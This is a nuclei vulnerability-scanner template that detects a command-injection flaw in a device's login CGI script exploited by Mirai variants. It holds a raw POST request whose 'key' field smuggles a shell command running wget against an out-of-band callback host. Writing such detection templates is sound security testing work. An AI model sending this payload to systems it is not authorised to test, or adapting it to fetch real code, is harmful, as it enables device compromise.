nuclei-templates/vulnerabilities/other/mirai-unknown-rce.yaml

27 lines
797 B
YAML
Raw Normal View History

id: mirai-unknown-rce
info:
name: Mirai Unknown - Remote Code Execution
author: gy741
severity: critical
description: The unknown exploit targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection.
reference: |
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
tags: mirai,rce,oob
requests:
- raw:
- |
POST /cgi-bin/login.cgi HTTP/1.1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
key=';`wget http://{{interactsh-url}}`;#
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"